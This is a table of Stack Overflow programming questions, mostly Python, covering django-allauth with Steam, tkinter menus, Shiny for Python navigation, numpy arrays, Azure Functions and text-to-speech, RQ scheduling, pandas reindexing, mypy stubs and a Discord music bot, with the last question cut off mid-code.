| QuestionId | UserId | QuestionTitle | QuestionBody | Tags | CreationDate | AnswerCount | UserExpertiseLevel | UserDisplayName |
|---|---|---|---|---|---|---|---|---|
79,368,426
| 995,071
|
django-allauth with steam
|
<p>As described in this <a href="https://github.com/pennersr/django-allauth/issues/3516" rel="nofollow noreferrer">issue on GitHub</a>, my login method (which does work, by the way) seems to throw an exception every time it is used:</p>
<pre><code>Missing required parameter in response from https://steamcommunity.com/openid/login: ('http://specs.openid.net/auth/2.0', 'assoc_type')
Traceback (most recent call last):
File "/home/negstek/.cache/pypoetry/virtualenvs/django-all-auth-to-steam-83qxtO4Z-py3.11/lib/python3.11/site-packages/openid/message.py", line 481, in getArg
return self.args[args_key]
~~~~~~~~~^^^^^^^^^^
KeyError: ('http://specs.openid.net/auth/2.0', 'assoc_type')
During handling of the above exception, another exception occurred:
Traceback (most recent call last):
File "/home/negstek/.cache/pypoetry/virtualenvs/django-all-auth-to-steam-83qxtO4Z-py3.11/lib/python3.11/site-packages/openid/consumer/consumer.py", line 1286, in _requestAssociation
assoc = self._extractAssociation(response, assoc_session)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/home/negstek/.cache/pypoetry/virtualenvs/django-all-auth-to-steam-83qxtO4Z-py3.11/lib/python3.11/site-packages/openid/consumer/consumer.py", line 1402, in _extractAssociation
assoc_type = assoc_response.getArg(OPENID_NS, 'assoc_type', no_default)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/home/negstek/.cache/pypoetry/virtualenvs/django-all-auth-to-steam-83qxtO4Z-py3.11/lib/python3.11/site-packages/openid/message.py", line 484, in getArg
raise KeyError((namespace, key))
KeyError: ('http://specs.openid.net/auth/2.0', 'assoc_type')
</code></pre>
<p><code>assoc_type</code> is missing from the Steam response. These are my app settings:</p>
<pre><code>INSTALLED_APPS = [
...
# social providers
"allauth.socialaccount.providers.openid",
"allauth.socialaccount.providers.steam",
...
]
MIDDLEWARE = [
...
"allauth.account.middleware.AccountMiddleware", # social providers
...
]
AUTHENTICATION_BACKENDS = (
"allauth.account.auth_backends.AuthenticationBackend",
"django.contrib.auth.backends.ModelBackend",
)
SOCIALACCOUNT_PROVIDERS = {
"steam": {
"APP": {
"client_id": STEAM_SECRET_KEY,
"secret": STEAM_SECRET_KEY,
}
},
}
</code></pre>
<p>Did I miss something in my implementation? Is there a way to avoid this exception being raised?</p>
|
<python><django><django-allauth><steam>
|
2025-01-19 04:38:53
| 1
| 701
|
negstek
|
79,368,424
| 1,413,856
|
How can I add a menu before the first in Python tkInter?
|
<p>I’m writing some code to add a menu to a tkInter application. Here is a working sample:</p>
<pre class="lang-py prettyprint-override"><code>import tkinter
main = tkinter.Tk()
main.title('Menu Test')
menubar = tkinter.Menu(main)
main['menu'] = menubar
m = tkinter.Menu()
menubar.add_cascade(menu=m, label='First')
m.add_command(label='Thing', command=lambda: print('thing'))
m = tkinter.Menu()
menubar.add_cascade(menu=m, label='Second')
m.add_command(label='Whatever', command=lambda: print('whatever'))
# How to add another menu before 'First' ?
main.mainloop()
</code></pre>
<p>Is it possible to add another menu <em>before</em> the first menu (<code>First</code>)?</p>
<p>Obviously, in this simple case, I can simply define it first, but I want to write a routine which populates a menu from a dictionary.</p>
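<p>For reference, a minimal sketch of one way to do this with <code>Menu.insert_cascade</code>, which takes the index to insert before. Creating the menus with <code>tearoff=0</code> (an adjustment to the original sample) keeps entry indices starting at 0; with the default tear-off entry the index is shifted by one.</p>
<pre class="lang-py prettyprint-override"><code>import tkinter

main = tkinter.Tk()
main.title('Menu Test')

# tearoff=0 avoids the dashed tear-off entry, so cascades start at index 0
menubar = tkinter.Menu(main, tearoff=0)
main['menu'] = menubar

m = tkinter.Menu(menubar, tearoff=0)
menubar.add_cascade(menu=m, label='First')
m.add_command(label='Thing', command=lambda: print('thing'))

# Insert a new cascade at index 0, i.e. before 'First'
m0 = tkinter.Menu(menubar, tearoff=0)
menubar.insert_cascade(0, menu=m0, label='Zeroth')
m0.add_command(label='Early thing', command=lambda: print('early'))

main.mainloop()
</code></pre>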
|
<python><tkinter><menu>
|
2025-01-19 04:38:01
| 2
| 16,921
|
Manngo
|
79,368,402
| 19,459,262
|
How to switch to a certain navigation panel when a button is clicked?
|
<p>I have an app written in Shiny for Python with several nav panels. On the front page, which the user gets sent to first, I have one button for each other nav panel. Is there any way for me to add functionality so that clicking a button sends you to the appropriate nav panel?</p>
<p>I've found ways to do this in R Shiny, but none in Shiny for Python.</p>
<p>Example code:</p>
<pre><code>from shiny import App, Inputs, Outputs, Session, reactive, render, req, ui
from shiny.express import input, ui
with ui.nav_panel('Start'):
ui.input_action_button("move_to_panel_1", "Move to panel 1") # clicking this moves you to panel 1
ui.input_action_button("move_to_panel_2", "Move to panel 2") # to panel 2
with ui.nav_panel('Panel 1'):
with ui.card():
@render.text
def text1():
return 'Text 1'
with ui.nav_panel('Panel 2'):
with ui.card():
@render.text
def text2():
return 'Text 2'
</code></pre>
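<p>A hedged sketch of one possible approach (assuming a recent Shiny for Python where <code>ui.navset_tab</code> and <code>ui.update_navs</code> are available in express mode): give the navset an <code>id</code>, then switch the selected panel from a reactive effect bound to each button.</p>
<pre class="lang-py prettyprint-override"><code>from shiny import reactive, render
from shiny.express import input, ui

with ui.navset_tab(id="tabs"):          # the id is what update_navs targets
    with ui.nav_panel("Start"):
        ui.input_action_button("move_to_panel_1", "Move to panel 1")
        ui.input_action_button("move_to_panel_2", "Move to panel 2")

    with ui.nav_panel("Panel 1"):
        @render.text
        def text1():
            return "Text 1"

    with ui.nav_panel("Panel 2"):
        @render.text
        def text2():
            return "Text 2"

@reactive.effect
@reactive.event(input.move_to_panel_1)
def _go_to_panel_1():
    ui.update_navs("tabs", selected="Panel 1")   # selected matches the panel title/value

@reactive.effect
@reactive.event(input.move_to_panel_2)
def _go_to_panel_2():
    ui.update_navs("tabs", selected="Panel 2")
</code></pre>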
|
<python><navigation><shiny-reactivity><py-shiny>
|
2025-01-19 04:18:27
| 1
| 784
|
Redz
|
79,368,190
| 10,415,492
|
Removing rows from numpy 3D array based on last element
|
<p>What I'm trying to do is essentially remove all rows <code>h,s</code> in a 3D numpy array <code>a</code> if <code>a[h,s,v] == some value</code> for all <code>v</code>.</p>
<p>More specifically, I have an image loaded with <code>cv2</code> which contains some transparent pixels. I'd like to create an HSV histogram without including the transparent pixels (i.e. <code>V = 255</code>).</p>
<p>Here's what I have now:</p>
<pre class="lang-py prettyprint-override"><code>import cv2
import numpy as np
IMAGE_FILE = './images/2024-11-17/00.png' # load image with some transparent pixels
# Read image into HSV
image = cv2.imread(IMAGE_FILE)
hsv = cv2.cvtColor(image, cv2.COLOR_BGR2HSV)
# Remove all pixels with V = 255
hsv_removed_transparency = []
i = np.where(hsv[:, :, 2] == 255) # indices of pixels with V = 255
for i1 in range(len(i[0])):
hsv_removed_transparency.append(np.delete(hsv[i[0][i1]], i[1][i1], axis=0))
</code></pre>
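<p>For reference, a minimal sketch of a vectorized alternative: a boolean mask selects the non-transparent pixels directly (assuming, as in the code above, that transparency is marked by <code>V == 255</code>), which avoids the <code>np.delete</code> loop entirely.</p>
<pre class="lang-py prettyprint-override"><code>import cv2
import numpy as np

IMAGE_FILE = './images/2024-11-17/00.png'  # path taken from the question

image = cv2.imread(IMAGE_FILE)
hsv = cv2.cvtColor(image, cv2.COLOR_BGR2HSV)

# 2D boolean mask of pixels to keep; indexing with it flattens the kept
# pixels into an (N, 3) array of H, S, V triples.
keep = hsv[:, :, 2] != 255
pixels = hsv[keep]

# Histogram over, e.g., the hue channel of the remaining pixels
hue_hist, _ = np.histogram(pixels[:, 0], bins=180, range=(0, 180))
</code></pre>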
|
<python><numpy><opencv><numpy-ndarray>
|
2025-01-19 00:37:14
| 1
| 435
|
Omaro_IB
|
79,368,152
| 9,780,838
|
Azure App Functions, Storage queue trigger
|
<p>I am new to Azure Functions and I am exploring using Queue Storage with my function. My runtime is Python, and I deploy the function via VS Code. The challenge I am facing is that when I add my configuration, such as my environment variables and endpoints, at the global level and deploy the function, the function is no longer available. Here is my code:</p>
<pre><code>import os
import requests
import logging
from datetime import datetime
from azure.storage.blob.aio import BlobServiceClient
import azure.functions as func
import asyncio
import json
import aiohttp
from isodate import parse_duration
import numpy as np
from ruptures.detection import Pelt
import librosa
import tempfile
import time
# --- Azure Function Configuration ---
# Replace with your actual values
STORAGE_CONNECTION_STRING = os.environ["AzureWebJobsStorage"] # Use single connection string if same
SOURCE_CONTAINER_NAME = os.environ["STORAGE_CONNECTION_STRING"]
DESTINATION_CONTAINER_NAME = os.environ["DESTINATION_CONTAINER_NAME"]
SPEECH_API_KEY = os.environ["SPEECH_API_KEY"]
YOUR_SAS_TOKEN = os.environ["YOUS_SAS_TOKEN"]
# --- Logging Configuration ---
logging.basicConfig(level=logging.INFO)
# --- Speech to Text API Configuration (with v3.2) ---
endpoint = "https://my-speech-name.cognitiveservices.azure.com/speechtotext/v3.2/transcriptions"
headers = {
"Content-Type": "application/json",
"Ocp-Apim-Subscription-Key": SPEECH_API_KEY
}
app = func.FunctionApp()
@app.function_name(name="sttqueue")
@app.queue_trigger(arg_name="msg",
queue_name="transcription-queue",
connection="AzureWebJobsStorage")
async def sttqueue(msg: func.QueueMessage):
logging.info('Python Queue trigger function processed a queue item: %s', msg.get_body().decode('utf-8'))
try:
batch = json.loads(msg.get_body().decode('utf-8'))
logging.info(f"Processing batch: {batch}")
source_blob_client = BlobServiceClient.from_connection_string(STORAGE_CONNECTION_STRING)
destination_blob_client = BlobServiceClient.from_connection_string(STORAGE_CONNECTION_STRING)
async with source_blob_client, destination_blob_client:
source_container_client = source_blob_client.get_container_client(SOURCE_CONTAINER_NAME)
destination_container_client = destination_blob_client.get_container_client(DESTINATION_CONTAINER_NAME)
async with aiohttp.ClientSession() as session:
for blob_name in batch:
blob_url = f"https://{source_container_client.account_name}.blob.core.windows.net/{source_container_client.container_name}/{blob_name}?{YOUR_SAS_TOKEN}"
await transcribe_audio(blob_name, blob_url, session, destination_container_client, endpoint, headers)
except Exception as e:
logging.error(f"Error processing queue message: {e}")
async def transcribe_audio(blob_name, blob_url, session, destination_container_client, endpoint, headers):
try:
pass  # ... (transcription logic elided; uses endpoint and headers)
except aiohttp.ClientError as e:
logging.error(f"Error communicating with Speech API: {e}")
except azure.core.exceptions.AzureError as e:
logging.error(f"Error accessing Azure Storage: {e}")
except Exception as e:
logging.error(f"Error transcribing {blob_name}: {e}")
return app # Return the Function App object
</code></pre>
<p><a href="https://i.sstatic.net/DettY04E.png" rel="nofollow noreferrer"><img src="https://i.sstatic.net/DettY04E.png" alt="no available func" /></a></p>
<p>However, when I comment out my environment variables and endpoints, the function is deployed without any issues.</p>
<p><a href="https://i.sstatic.net/BA7Skxzu.png" rel="nofollow noreferrer"><img src="https://i.sstatic.net/BA7Skxzu.png" alt="enter image description here" /></a></p>
<p>As you can see, after removing the config environment variables and endpoint, the function is available along with the trigger. What am I doing wrong? Any suggestions to fix this issue?</p>
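<p>One possible cause (an assumption, not a confirmed diagnosis): a module-level <code>os.environ["..."]</code> raises <code>KeyError</code> at import time when that app setting is missing in Azure, and an import-time failure prevents the function from being indexed, so it disappears from the portal. Note also that in the posted code <code>SOURCE_CONTAINER_NAME</code> is read from the <code>STORAGE_CONNECTION_STRING</code> setting, which may not exist as an app setting. A sketch of reading configuration lazily so a missing setting fails a single invocation instead of the whole deployment:</p>
<pre class="lang-py prettyprint-override"><code>import logging
import os

import azure.functions as func

app = func.FunctionApp()

@app.function_name(name="sttqueue")
@app.queue_trigger(arg_name="msg",
                   queue_name="transcription-queue",
                   connection="AzureWebJobsStorage")
async def sttqueue(msg: func.QueueMessage):
    # Read settings inside the function body rather than at module level.
    source_container = os.environ.get("SOURCE_CONTAINER_NAME")
    destination_container = os.environ.get("DESTINATION_CONTAINER_NAME")
    speech_api_key = os.environ.get("SPEECH_API_KEY")
    if not all([source_container, destination_container, speech_api_key]):
        logging.error("Missing one or more required app settings")
        return
    logging.info("Processing queue item: %s", msg.get_body().decode("utf-8"))
</code></pre>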
|
<python><azure><function><speech-to-text>
|
2025-01-18 23:54:19
| 1
| 321
|
M B
|
79,368,128
| 11,222,417
|
how to generate value for python defaultdict based on the key
|
<p>In Python, is it possible to generate a value for a <code>defaultdict</code> that is a function of the key?
For example:</p>
<pre><code>from collections import defaultdict
d = defaultdict(lambda key=None: key * 2)
</code></pre>
<p>so that <code>d[1]</code> will produce the value 2.</p>
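<p>For reference: this particular lambda does not work, because <code>defaultdict</code> calls its factory with no arguments, so the factory never sees the key. A minimal sketch of the usual alternative, a <code>dict</code> subclass overriding <code>__missing__</code>:</p>
<pre class="lang-py prettyprint-override"><code>class KeyedDefaultDict(dict):
    """dict whose missing values are computed from the key itself."""

    def __init__(self, default_factory, *args, **kwargs):
        super().__init__(*args, **kwargs)
        self.default_factory = default_factory

    def __missing__(self, key):
        value = self.default_factory(key)
        self[key] = value          # cache the result, like defaultdict does
        return value

d = KeyedDefaultDict(lambda key: key * 2)
print(d[1])  # 2
</code></pre>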
|
<python><defaultdict>
|
2025-01-18 23:25:40
| 1
| 305
|
J. Doe
|
79,368,119
| 412,252
|
Scheduling periodic RQ tasks, using asyncio
|
<h4>I think that the architecture of RQ Scheduler is fundamentally flawed and it's much more complicated than it needs to be.</h4>
<p><strong>Schedules are stored in Redis</strong><br />
Even if you remove or modify your scheduling code, the old schedules remain in Redis until explicitly canceled.</p>
<p><strong>Non-declarative model</strong><br />
Simply deleting the <code>scheduler.cron(...)</code> line does not remove the schedule; you must manually run <code>scheduler.cancel(job_id)</code>.</p>
<p><strong><code>rqscheduler</code> doesn’t run your code</strong><br />
The <code>rqscheduler</code> command only polls Redis for due jobs. It does not import or execute your Python code to dynamically update schedules.</p>
<p><strong>No built-in reconciliation</strong><br />
You must handle the lifecycle of scheduled jobs—adding, updating, or removing them—on your own, often requiring extra scripts or manual processes.</p>
<h4>I strongly prefer Celery Beat's approach of dispatching / enqueuing tasks, from my python code, exactly when they are scheduled to run.</h4>
<p>However, in this particular project, I'm using RQ and thus, Celery Beat is unavailable to me.</p>
<p>How can I create something simple that takes cron strings and works in a similar way to Celery Beat?</p>
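<p>A minimal, hedged sketch of one way to do this (assuming the third-party <code>croniter</code> package and a plain RQ queue; the module paths below are illustrative): keep the schedule as a dict in code, and for each entry run an asyncio task that sleeps until the next cron fire time and then enqueues the job. Removing an entry from the dict removes the schedule on the next restart, with nothing persisted in Redis besides the enqueued jobs themselves.</p>
<pre class="lang-py prettyprint-override"><code>import asyncio
from datetime import datetime, timezone

from croniter import croniter   # pip install croniter
from redis import Redis
from rq import Queue

# Declarative schedule: cron string -> dotted path of the task (illustrative names)
SCHEDULE = {
    "*/5 * * * *": "myapp.tasks.refresh_cache",
    "0 3 * * *": "myapp.tasks.nightly_report",
}

queue = Queue(connection=Redis())

async def run_cron(cron_expr: str, task_path: str) -> None:
    while True:
        now = datetime.now(timezone.utc)
        next_run = croniter(cron_expr, now).get_next(datetime)
        await asyncio.sleep((next_run - now).total_seconds())
        queue.enqueue(task_path)   # dispatch exactly when due, like Celery Beat

async def main() -> None:
    await asyncio.gather(*(run_cron(c, t) for c, t in SCHEDULE.items()))

if __name__ == "__main__":
    asyncio.run(main())
</code></pre>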
|
<python><cron><python-asyncio><scheduler><rq>
|
2025-01-18 23:16:49
| 1
| 4,674
|
demux
|
79,367,766
| 19,082,083
|
How can I ensure that Azure Text-to-Speech properly pronounces word-for-word translations?
|
<p>I'm working on an app using Azure, Gemini, Python, and Dart, and I want to make sure the pronunciation between languages is spot on. For example, I want to translate between German and Spanish: the goal is for 'hallo' -> 'hola' to be pronounced correctly in both languages. The same goes for English and Spanish 'hello' -> 'hola'. Azure does well with sentences, but struggles with word-for-word translations.</p>
<p>Here's my code:</p>
<ul>
<li>translation_service.py</li>
</ul>
<pre class="lang-py prettyprint-override"><code>
class TranslationService:
def __init__(self):
load_dotenv()
api_key = os.getenv("GEMINI_API_KEY")
if not api_key:
raise ValueError("GEMINI_API_KEY not found in environment variables")
genai.configure(api_key=api_key)
self.generation_config = {
"temperature": 1,
"top_p": 0.95,
"top_k": 40,
"max_output_tokens": 8192,
"response_mime_type": "text/plain",
}
self.model = GenerativeModel(
model_name="gemini-2.0-flash-exp",
generation_config=self.generation_config
)
self.tts_service = EnhancedTTSService()
# Initialize chat session with translation instructions
self.chat_session = self.model.start_chat(
history=[
{
"role": "user",
"parts": [
"""
Text
"
(Could be any phrase or word)
"
German Translation:
Conversational-native:
"Ich suche einen Job, damit ich finanziell unabhängig sein kann."
word by word Conversational-native German-Spanish:
"Ich (Yo) suche (busco) einen (un) Job (trabajo), damit (para que) ich (yo) finanziell (económicamente) unabhängig (independiente) sein (ser) kann (pueda)."
English Translation:
Conversational-native:
"I'm looking for a job so I can be financially independent."
word by word Conversational-native English-Spanish:
"I'm (Yo estoy) looking for (buscando) a job (un trabajo) so (para que) I (yo) can be (pueda ser) financially (económicamente) independent (independiente)."
"""
]
}
]
)
def _restore_accents(self, text: str) -> str:
"""Restore proper accents and special characters."""
accent_map = {
"a": "á", "e": "é", "i": "í", "o": "ó", "u": "ú", "n": "ñ",
"A": "Á", "E": "É", "I": "Í", "O": "Ó", "U": "Ú", "N": "Ñ",
}
patterns = {
r"([aeiou])´": lambda m: accent_map[m.group(1)],
r"([AEIOU])´": lambda m: accent_map[m.group(1)],
r"n~": "ñ",
r"N~": "Ñ",
}
for pattern, replacement in patterns.items():
if callable(replacement):
text = re.sub(pattern, replacement, text)
else:
text = re.sub(pattern, replacement, text)
return text
async def process_prompt(self, text: str, source_lang: str, target_lang: str) -> Translation:
try:
response = self.chat_session.send_message(text)
generated_text = response.text
print(f"Generated text from Gemini: {generated_text[:100]}...")
audio_filename = await self.tts_service.text_to_speech(
text=generated_text
)
if audio_filename:
print(f"Successfully generated audio: {audio_filename}")
else:
print("Audio generation failed")
return Translation(
original_text=text,
translated_text=generated_text,
source_language=source_lang,
target_language=target_lang,
audio_path=audio_filename,
translations={"main": generated_text},
word_by_word=self._generate_word_by_word(text, generated_text),
grammar_explanations=self._generate_grammar_explanations(generated_text)
)
except Exception as e:
print(f"Error in process_prompt: {str(e)}")
raise Exception(f"Translation processing failed: {str(e)}")
def _generate_word_by_word(self, original: str, translated: str) -> dict[str, dict[str, str]]:
"""Generate word-by-word translation mapping."""
result = {}
original_words = original.split()
translated_words = translated.split()
for i, word in enumerate(original_words):
if i < len(translated_words):
result[word] = {
"translation": translated_words[i],
"pos": "unknown",
}
return result
def _auto_fix_spelling(self, text: str) -> str:
"""Fix spelling in the given text."""
words = re.findall(r"\b\w+\b|[^\w\s]", text)
corrected_words = []
for word in words:
if not re.match(r"\w+", word):
corrected_words.append(word)
continue
if self.spell.unknown([word]):
correction = self.spell.correction(word)
if correction:
if word.isupper():
correction = correction.upper()
elif word[0].isupper():
correction = correction.capitalize()
word = correction
corrected_words.append(word)
return " ".join(corrected_words)
</code></pre>
<ul>
<li>tts_service.py</li>
</ul>
<pre class="lang-py prettyprint-override"><code>
from azure.cognitiveservices.speech.audio import AudioOutputConfig
import os
from typing import Optional
from datetime import datetime
import asyncio
import re
class EnhancedTTSService:
def __init__(self):
# Initialize Speech Config
self.subscription_key = os.getenv("AZURE_SPEECH_KEY")
self.region = os.getenv("AZURE_SPEECH_REGION")
if not self.subscription_key or not self.region:
raise ValueError("Azure Speech credentials not found in environment variables")
# Create speech config
self.speech_config = SpeechConfig(
subscription=self.subscription_key,
region=self.region
)
self.speech_config.set_speech_synthesis_output_format(
SpeechSynthesisOutputFormat.Audio16Khz32KBitRateMonoMp3
)
# Voice mapping with specific styles and roles
self.voice_mapping = {
'en': 'en-US-JennyMultilingualNeural',
'es': 'es-ES-ArabellaMultilingualNeural',
'de': 'de-DE-SeraphinaMultilingualNeural'
}
def _get_temp_directory(self) -> str:
"""Create and return the temporary directory path"""
if os.name == 'nt': # Windows
temp_dir = os.path.join(os.environ.get('TEMP', ''), 'tts_audio')
else: # Unix/Linux
temp_dir = '/tmp/tts_audio'
os.makedirs(temp_dir, exist_ok=True)
return temp_dir
def _detect_language(self, text: str) -> str:
"""Detect the primary language of the text"""
# Simple language detection based on character patterns
if re.search(r'[äöüßÄÖÜ]', text):
return 'de'
elif re.search(r'[áéíóúñ¿¡]', text):
return 'es'
return 'en'
def _generate_ssml(self, text: str) -> str:
"""Generate valid SSML with proper escaping and language tags"""
# Clean the text
text = text.replace('&', '&amp;').replace('<', '&lt;').replace('>', '&gt;')
# Detect primary language
primary_lang = self._detect_language(text)
voice_name = self.voice_mapping.get(primary_lang, self.voice_mapping['en'])
ssml = f"""<?xml version='1.0'?>
<speak version='1.0' xmlns='http://www.w3.org/2001/10/synthesis' xml:lang='{primary_lang}'>
<voice name='{voice_name}'>
<prosody rate="0.95" pitch="0%">
{text}
</prosody>
</voice>
</speak>"""
return ssml
async def text_to_speech(self, text: str, output_path: Optional[str] = None) -> Optional[str]:
"""Convert text to speech with robust error handling"""
synthesizer = None
try:
print(f"\nStarting TTS process for text: {text[:100]}...") # First 100 chars
# Generate output path if not provided
if not output_path:
temp_dir = self._get_temp_directory()
timestamp = datetime.now().strftime('%Y%m%d_%H%M%S')
output_path = os.path.join(temp_dir, f"speech_{timestamp}.mp3")
# Configure audio output
audio_config = AudioOutputConfig(filename=output_path)
# Create synthesizer for this request
synthesizer = SpeechSynthesizer(
speech_config=self.speech_config,
audio_config=audio_config
)
# Generate and validate SSML
ssml = self._generate_ssml(text)
print(f"Generated SSML length: {len(ssml)} characters")
# Perform synthesis
print("Starting speech synthesis...")
result = await asyncio.get_event_loop().run_in_executor(
None,
lambda: synthesizer.speak_ssml_async(ssml).get()
)
# Handle result
if result.reason == ResultReason.SynthesizingAudioCompleted:
print("Speech synthesis completed successfully")
return os.path.basename(output_path)
elif result.reason == ResultReason.Canceled:
print(f"Speech synthesis canceled: {result.cancellation_details.reason}")
print(f"Error details: {result.cancellation_details.error_details}")
return None
return None
except Exception as e:
print(f"Exception in text_to_speech: {str(e)}")
return None
finally:
# Proper cleanup
if synthesizer:
try:
synthesizer.stop_speaking_async()
except:
pass
</code></pre>
<hr />
<p>This is an example of how the correct pronunciation should sound:</p>
<p>German-Spanish (hello example) (this is the desired output with the correct word-for-word pronunciation)</p>
<p><a href="https://jmp.sh/s/8sftiJ01aUreR3LDYRWn" rel="nofollow noreferrer">https://jmp.sh/s/8sftiJ01aUreR3LDYRWn</a></p>
<p>English-Spanish (hello example) (this is the desired output with the correct word-for-word pronunciation)</p>
<p><a href="https://jmp.sh/s/9MM1LqTqGH1CvddGhA1l" rel="nofollow noreferrer">https://jmp.sh/s/9MM1LqTqGH1CvddGhA1l</a></p>
<p>Now let’s do a word-for-word translation, where we’ll focus on pronouncing the Spanish "ñ," "h," and "ll" properly.</p>
<p>Here’s the Spanish sentence:</p>
<p>"Jugo de piña para la niña y jugo de mora para la señora porque están en el hospital y afuera está lloviendo."</p>
<p>Translation:</p>
<p>"I got pineapple juice for the girl and blackberry juice for the lady because they’re in the hospital and it’s raining outside."</p>
<p>German-Spanish (this is the desired output with the correct word-for-word pronunciation)</p>
<p><a href="https://jmp.sh/s/aRFlpZc99Dw18Uexi8uS" rel="nofollow noreferrer">https://jmp.sh/s/aRFlpZc99Dw18Uexi8uS</a></p>
<p>English-Spanish (this is the desired output with the correct word-for-word pronunciation)</p>
<p><a href="https://jmp.sh/eY9ZhlTi" rel="nofollow noreferrer">https://jmp.sh/eY9ZhlTi</a></p>
<hr />
<p>Currently I have this pronunciation with the same examples</p>
<p>German-Spanish and English-Spanish (hello example) (which is incorrect because the word-for-word pronunciation is not accurate)</p>
<p><a href="https://jmp.sh/iExSVBGk" rel="nofollow noreferrer">https://jmp.sh/iExSVBGk</a></p>
<p>Let’s go back to the word-for-word breakdown, again emphasizing Spanish pronunciation for the tricky letters:</p>
<p>"ñ" (sounds like “ny” in canyon, e.g., piña, niña)
"h" (silent in Spanish, e.g., hospital)
"ll" (varies regionally but often sounds like “y” in yes, e.g., lloviendo).
So here’s the sentence again:</p>
<p>"Jugo de piña para la niña y jugo de mora para la señora porque están en el hospital y afuera está lloviendo."</p>
<p>Translation:</p>
<p>"I got pineapple juice for the girl and blackberry juice for the lady because they’re in the hospital and it’s raining outside."</p>
<p>German-Spanish and English-Spanish (which is incorrect because the word-for-word pronunciation is not accurate)</p>
<p><a href="https://jmp.sh/PxKHNWjx" rel="nofollow noreferrer">https://jmp.sh/PxKHNWjx</a></p>
<hr />
<p>This is the service I use with Azure:</p>
<p><a href="https://i.sstatic.net/XI2UDAIc.png" rel="nofollow noreferrer"><img src="https://i.sstatic.net/XI2UDAIc.png" alt="This is the service I use with Azure" /></a></p>
<p>I’ve tried the 'langid' library, but it seems like it doesn’t work for me. My goal is to be able to hear the correct pronunciation of the English-Spanish and German-Spanish word pairs during word-for-word translation.</p>
<p>Thank you.</p>
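<p>For reference, one hedged idea (a sketch, not a verified fix): SSML supports a <code>lang</code> element with an <code>xml:lang</code> attribute inside a multilingual voice, so each fragment of the word-for-word line can carry its own language tag and be pronounced with that language's rules. The voice name and fragments below are illustrative.</p>
<pre class="lang-py prettyprint-override"><code># Sketch: build SSML where every (text, language) fragment is wrapped in a
# <lang> element so a multilingual voice switches pronunciation per word.
from xml.sax.saxutils import escape

def build_word_by_word_ssml(pairs, voice_name="en-US-JennyMultilingualNeural"):
    """pairs: list of (text, bcp47_lang) tuples, e.g. [("hallo", "de-DE"), ("hola", "es-ES")]."""
    fragments = " ".join(
        f"<lang xml:lang='{lang}'>{escape(text)}</lang>" for text, lang in pairs
    )
    return (
        "<speak version='1.0' xmlns='http://www.w3.org/2001/10/synthesis' xml:lang='en-US'>"
        f"<voice name='{voice_name}'>{fragments}</voice>"
        "</speak>"
    )

ssml = build_word_by_word_ssml([("hallo", "de-DE"), ("hola", "es-ES")])
</code></pre>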
|
<python><azure><azure-functions><google-gemini><language-translation>
|
2025-01-18 18:37:02
| 1
| 972
|
pomoworko.com
|
79,367,707
| 1,788,656
|
TypeError: Index.reindex() got an unexpected keyword argument 'fill_value'
|
<p>I am trying to get the indices of the missing dates by comparing the index to a list of dates with none missing, as follows:</p>
<pre><code>a = pd.DatetimeIndex(["2000", "2001", "2002", "2003",
"2004", "2005", "2009", "2010"])
b = pd.DatetimeIndex(["2000", "2001", "2002", "2003",
"2004", "2005", "2006", "2007",
"2008", "2009", "2010"])
a.reindex(b)
</code></pre>
<p>I got the following</p>
<pre><code>(DatetimeIndex(['2000-01-01', '2001-01-01', '2002-01-01', '2003-01-01',
'2004-01-01', '2005-01-01', '2006-01-01', '2007-01-01',
'2008-01-01', '2009-01-01', '2010-01-01'],
dtype='datetime64[ns]', freq=None),
array([ 0, 1, 2, 3, 4, 5, -1, -1, -1, 6, 7]))
</code></pre>
<p>I tried to replace all missing value which is -1 to Nan, by using <code>a.reindex(b, fill_value=np.NAN)</code> but I got the following error <code>TypeError: Index.reindex() got an unexpected keyword argument ‘fill_value’</code></p>
<p>According to the <a href="https://pandas.pydata.org/docs/reference/api/pandas.DataFrame.reindex.html" rel="nofollow noreferrer">pandas documentation</a>, <code>fill_value</code> is among the parameters of <code>reindex</code>.
Any ideas?</p>
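<p>For reference, a short sketch of the distinction: <code>fill_value</code> belongs to <code>Series.reindex</code>/<code>DataFrame.reindex</code>, while <code>Index.reindex</code> returns the new index plus an integer indexer in which -1 marks missing positions; that indexer can be converted to NaN manually, or the data can be wrapped in a Series first.</p>
<pre class="lang-py prettyprint-override"><code>import numpy as np
import pandas as pd

a = pd.DatetimeIndex(["2000", "2001", "2002", "2003",
                      "2004", "2005", "2009", "2010"])
b = pd.DatetimeIndex(["2000", "2001", "2002", "2003",
                      "2004", "2005", "2006", "2007",
                      "2008", "2009", "2010"])

indexer = a.get_indexer(b)                        # -1 where the date is missing from `a`
positions = np.where(indexer == -1, np.nan, indexer)

# Or go through a Series, whose reindex does support fill_value:
s = pd.Series(range(len(a)), index=a).reindex(b)  # missing dates become NaN
</code></pre>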
|
<python><pandas><datetime>
|
2025-01-18 18:01:19
| 2
| 725
|
Kernel
|
79,367,539
| 561,243
|
mypy does not install types-seaborn automatically
|
<p>I am working on a library package that depends on some other libraries, and I statically type-check my code.</p>
<p>When running mypy (version 1.14.0) for the first time in a freshly created environment, mypy finds the external libraries (for example peewee) and automatically installs the type stubs from typeshed. But it does not install types-seaborn. So far this is the one and only exception to the rule.</p>
<p>If I install it manually with:</p>
<pre class="lang-none prettyprint-override"><code>pip install types-seaborn
</code></pre>
<p>then mypy runs without any problem.</p>
<p>As a workaround I have explicitly added the types-seaborn dependency to the pyproject.toml file, but I would have preferred the automatic behavior.</p>
<p>Do you know why this is happening and how can I fix it?</p>
|
<python><seaborn><mypy><typeshed>
|
2025-01-18 16:40:07
| 1
| 367
|
toto
|
79,367,477
| 10,778,270
|
ffmpeg process 20564 successfully terminated with return code of 3436169992
|
<p>I am trying to play a YouTube video as audio through a Discord bot. I ran into a 403 Forbidden error and added the YDL_OPTIONS to bypass it. Now the code throws error code 3436169992. The bot writes "Now playing: xxxx" to the server, but no audio is played. Any pointers?</p>
<pre><code>FFMPEG_OPTIONS = {
"before_options": "-reconnect 1 -reconnect_streamed 1 -reconnect_delay_max 5",
"options": "-vn -filter:a \"volume=0.25\""
}
# yt-dlp options
YDL_OPTIONS = {
"format": "bestaudio[ext=webm][acodec=opus]/bestaudio",
"noplaylist": True,
"quiet": True,
"extract_flat": False,
"no_warnings": True,
"source_address": "0.0.0.0" # Prevents YouTube throttling
}
voice_clients = {}
@bot.event
async def on_message(message):
if message.content.startswith("-play"):
try:
# Ensure the user is in a voice channel
